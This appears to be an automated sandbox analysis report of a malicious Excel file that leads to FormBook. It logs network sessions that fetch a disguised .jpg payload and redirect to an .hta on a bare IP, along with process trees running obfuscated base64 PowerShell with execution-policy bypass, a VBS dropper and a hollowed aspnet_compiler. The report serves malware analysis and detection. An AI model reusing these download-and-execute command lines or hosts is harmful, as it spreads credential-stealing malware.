                                                  3 | 192.168.2.22 | 49167 | 142.215.209.77 | 443 | 3108 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-02 06:24:58 UTC | 198 | OUT | GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                                                  Host: 1016.filemail.com
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:24:59 UTC | 328 | IN | HTTP/1.1 200 OK
                                                  Content-Length: 2230233
                                                  Content-Type: image/jpeg
                                                  Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: 1c84779d9886011235a5e11f64ee8efb
                                                  X-Transfer-ID: qxdlxyadbikkvgc
                                                  Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                  Date: Mon, 02 Dec 2024 06:24:58 GMT
                                                  Connection: close


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.22 | 49170 | 188.114.96.6 | 443 | 1520 | C:\Windows\System32\mshta.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-02 06:25:00 UTC | 426 | OUT | GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: fr-FR
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: linkjago.me
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:25:01 UTC | 1198 | IN | HTTP/1.1 302 Found
                                                  Date: Mon, 02 Dec 2024 06:25:01 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 82
                                                  Connection: close
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: same-origin
                                                  x-dns-prefetch-control: off
                                                  x-frame-options: SAMEORIGIN
                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                  x-download-options: noopen
                                                  x-content-type-options: nosniff
                                                  origin-agent-cluster: ?1
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: no-referrer
                                                  x-xss-protection: 0
                                                  location: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
                                                  vary: Accept, Accept-Encoding
                                                  x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                  Cache-Control: private
                                                  x-do-orig-status: 302
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=37bb30S5OQ9%2BkIbDOQdEGU02Nbr%2FjGmReco6pZtxZu0hgMoVch92KoSa7yNFg0wb1VQQ44dWcf95H0Q2WrOWGswCJAnNfDxZPP1dKAV5zmT4XWEPkfMhH8Ch0CGFrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eb93cbd8c234231-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-02 06:25:01 UTC | 216 | IN | Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2222&min_rtt=2213&rtt_var=849&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=1008&delivery_rate=1275666&cwnd=127&unsent_bytes=0&cid=356ae204f30c3934&ts=897&x=0"
                                                  2024-12-02 06:25:01 UTC | 82 | IN | Data Ascii: Found. Redirecting to http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  5 | 192.168.2.22 | 49172 | 142.215.209.77 | 443 | 3512 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-12-02 06:25:16 UTC | 198 | OUT | GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                                                  Host: 1016.filemail.com
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:25:17 UTC | 328 | IN | HTTP/1.1 200 OK
                                                  Content-Length: 2230233
                                                  Content-Type: image/jpeg
                                                  Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: 1c84779d9886011235a5e11f64ee8efb
                                                  X-Transfer-ID: qxdlxyadbikkvgc
                                                  Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                  Date: Mon, 02 Dec 2024 06:25:16 GMT
                                                  Connection: close



                                                  Target ID:0
                                                  Start time:01:24:11
                                                  Start date:02/12/2024
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13f600000
                                                  File size:28'253'536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:4
                                                  Start time:01:24:36
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\mshta.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                  Imagebase:0x13f740000
                                                  File size:13'824 bytes
                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:01:24:42
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
                                                  Imagebase:0x4abb0000
                                                  File size:345'088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:01:24:42
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
                                                  Imagebase:0x13f4c0000
                                                  File size:443'392 bytes
                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:01:24:45
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
                                                  Imagebase:0x13f6a0000
                                                  File size:2'758'280 bytes
                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:01:24:46
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
                                                  Imagebase:0x13fcc0000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:01:24:52
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
                                                  Imagebase:0xffbb0000
                                                  File size:168'960 bytes
                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:01:24:53
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
                                                  Imagebase:0x13f4c0000
                                                  File size:443'392 bytes
                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:01:24:57
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\mshta.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                  Imagebase:0x13f1a0000
                                                  File size:13'824 bytes
                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:01:25:04
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
                                                  Imagebase:0x4a330000
                                                  File size:345'088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:01:25:04
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
                                                  Imagebase:0x13f4c0000
                                                  File size:443'392 bytes
                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:01:25:05
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
                                                  Imagebase:0x13f0d0000
                                                  File size:2'758'280 bytes
                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:01:25:06
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
                                                  Imagebase:0x13fc40000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:01:25:11
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
                                                  Imagebase:0xff210000
                                                  File size:168'960 bytes
                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:01:25:11
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
                                                  Imagebase:0x13f4c0000
                                                  File size:443'392 bytes
                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:01:25:20
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                  Imagebase:0xa40000
                                                  File size:55'384 bytes
                                                  MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:01:25:35
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                  Imagebase:0xa40000
                                                  File size:55'384 bytes
                                                  MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Module: Sheet1

                                                  Declaration
                                                  Attribute VB_Name = "Sheet1"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                  Module: Sheet2

                                                  Declaration
                                                  Attribute VB_Name = "Sheet2"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                  Module: ThisWorkbook

                                                  Declaration
                                                  Attribute VB_Name = "ThisWorkbook"
                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.422769979.0000000002E00000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_2e00000_mshta.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction ID: f6f0c69f69ec071507fd3d12a691d6d413f807da0261bc850b31cf896fa180b7
                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction Fuzzy Hash:

                                                    Execution Graph

                                                    Execution Coverage:3.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:4
                                                    Total number of Limit Nodes:0
                                                    execution_graph 4118 7fe899d7c25 4119 7fe899d7c33 4118->4119 4120 7fe899d7be3 URLDownloadToFileW 4119->4120 4121 7fe899d7c00 4119->4121 4120->4121

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451397679.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe899d0000_powershell.jbxd
                                                    Similarity
                                                    • API ID: DownloadFile
                                                    • String ID:
                                                    • API String ID: 1407266417-0
                                                    • Opcode ID: a0035c940332f12a217b0e092e9456d6030e47891a6536e7ec8ade8ec5b5b7e3
                                                    • Instruction ID: 11c33c7b11a99dd25f2647b1e9da73b6ea15c438626c603691e95b34cad6ad45
                                                    • Opcode Fuzzy Hash: a0035c940332f12a217b0e092e9456d6030e47891a6536e7ec8ade8ec5b5b7e3
                                                    • Instruction Fuzzy Hash: C931B171918A5C8FDB19EF5CD8857A9B7E0FB59311F00822ED04DD3261CB70B8058B81

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451397679.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe899d0000_powershell.jbxd
                                                    Similarity
                                                    • API ID: DownloadFile
                                                    • String ID:
                                                    • API String ID: 1407266417-0
                                                    • Opcode ID: e9bf2a7a0ff1d59173676c30a39d75dcb183eb9f2beb233881a0df3a09769d3e
                                                    • Instruction ID: 2d87ec3c0a72d8d44d0dd28553830fe3f1053cee691a371359325566c5076767
                                                    • Opcode Fuzzy Hash: e9bf2a7a0ff1d59173676c30a39d75dcb183eb9f2beb233881a0df3a09769d3e
                                                    • Instruction Fuzzy Hash: 9441F67091CB889FD716DB589C847BABBF0FB56321F04426FD089D3562CB646806C781

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451397679.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe899d0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d938ac031c0ac3bb16f808beca7a89af3d7f54faf57485278deed4b8ace4750
                                                    • Instruction ID: 8a1852348879f0a802aba4d33ad226a6e6383b07196a7692035ffdf5dea7cc1c
                                                    • Opcode Fuzzy Hash: 3d938ac031c0ac3bb16f808beca7a89af3d7f54faf57485278deed4b8ace4750
                                                    • Instruction Fuzzy Hash: 4521A16191E3D15FE317A778AC612E87FA0AF03224F0901D7D0D8CB0F3D619655AC766

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ad21bd4a7343743214b381b547eaa27271d0756cd2cc3fbac4c709aaac8a542
                                                    • Instruction ID: e0ae800f8587c010b1374f1a4c21174bf8cb690650d307d426589c2af2782764
                                                    • Opcode Fuzzy Hash: 1ad21bd4a7343743214b381b547eaa27271d0756cd2cc3fbac4c709aaac8a542
                                                    • Instruction Fuzzy Hash: 1522F43090CB894FE79ADB2C94506697FE2FF9A354F2401EAD48EC72A3DA34AC55C741

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce42d0076088c2146806d2bb55c3487cd9c3ed2b40682005059e883d93e05633
                                                    • Instruction ID: fb3b6d41a96943c90a869811ff568f7ad4e09e9b5d0797e0523e443f7f0f6d11
                                                    • Opcode Fuzzy Hash: ce42d0076088c2146806d2bb55c3487cd9c3ed2b40682005059e883d93e05633
                                                    • Instruction Fuzzy Hash: 58C1263090DB890FE75AA76C58506BA7FE1EF46784F1901EBE48ECB1A3D618AC15C361

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ef1cefe6f52f49f5b6fde2383b0fad921f5166722e41ed846e02905f3e98d71
                                                    • Instruction ID: 5ca496f9d8ef5fbef73b6864982b36a010e76d539c2f464de8ef186a0d234f36
                                                    • Opcode Fuzzy Hash: 4ef1cefe6f52f49f5b6fde2383b0fad921f5166722e41ed846e02905f3e98d71
                                                    • Instruction Fuzzy Hash: F1C1F33080E7C95FD3579728A8146B97FE1EF47260F1911EBD48DCB0A3D619AD1AC3A2

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1c65736c00fb6abbb13ba03d38f80b698443e5c754eca1803143cb2db4267e4
                                                    • Instruction ID: cee0f8858e45b0afe1eaa497c99e790bf72584d41d4a091764910384bee18d38
                                                    • Opcode Fuzzy Hash: f1c65736c00fb6abbb13ba03d38f80b698443e5c754eca1803143cb2db4267e4
                                                    • Instruction Fuzzy Hash: B9B10021A0E7C90FE347973C58642657FE1EF47244B2A01EBC48ECB1B3DA189C5AC362

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88e1c8d97241f33eb15a932310b58ecd33a3c7bf2daeb69b1527af7ca5248e51
                                                    • Instruction ID: 6507a308b7912adb0f63028b3cdf0a2edb99906a91655161f647d056092672ce
                                                    • Opcode Fuzzy Hash: 88e1c8d97241f33eb15a932310b58ecd33a3c7bf2daeb69b1527af7ca5248e51
                                                    • Instruction Fuzzy Hash: 06415631D1CB8A0FE356E72C58503B97BE2EF86250F1910EBC48DCB1A3DA25AC158391

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 320 7fe89aa10c9-7fe89aa10dc 321 7fe89aa10ed-7fe89aa1124 320->321 322 7fe89aa10de-7fe89aa10e7 320->322 323 7fe89aa112a-7fe89aa119e 321->323 324 7fe89aa11c1-7fe89aa11cb 321->324 322->321 334 7fe89aa11a6-7fe89aa11be 323->334 325 7fe89aa11d8-7fe89aa11e8 324->325 326 7fe89aa11cd-7fe89aa11d7 324->326 327 7fe89aa11ea-7fe89aa11ee 325->327 328 7fe89aa11f5-7fe89aa121a 325->328 327->328
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d06b9de4395418ef46f07e6b301d6829f87b31097fd0318c038170baa75f92ae
                                                    • Instruction ID: 49bebfb337727d795ab6e9bd39aa787d2b37222ff1720193c9c4170a18a61eb8
                                                    • Opcode Fuzzy Hash: d06b9de4395418ef46f07e6b301d6829f87b31097fd0318c038170baa75f92ae
                                                    • Instruction Fuzzy Hash: B0318001A4D7C90FD347937C1964255BFE2DF5724872E10EBC58ECB5A3E5084C6AC366
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ae50ad98dda29f640a90777ea69f003a7dd194f1c3ba146df9a566e088565b9
                                                    • Instruction ID: 0c4bec78f8737608718ec8f533a062f022ce71c99dc1f7fd3836c70aa2f88dfe
                                                    • Opcode Fuzzy Hash: 5ae50ad98dda29f640a90777ea69f003a7dd194f1c3ba146df9a566e088565b9
                                                    • Instruction Fuzzy Hash: EAF15A2090EBC90FD747A73898246A63FE1EF97254F1A01EBD48DCB1B3D6189D4AC361
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbe83da96928bc98881e80b5367dda739ddfcbf6563a71eafdcb07f868115681
                                                    • Instruction ID: 2343f320a6c68fc8c17afe8f493fd3fc35df811456d1e38291cabec749204576
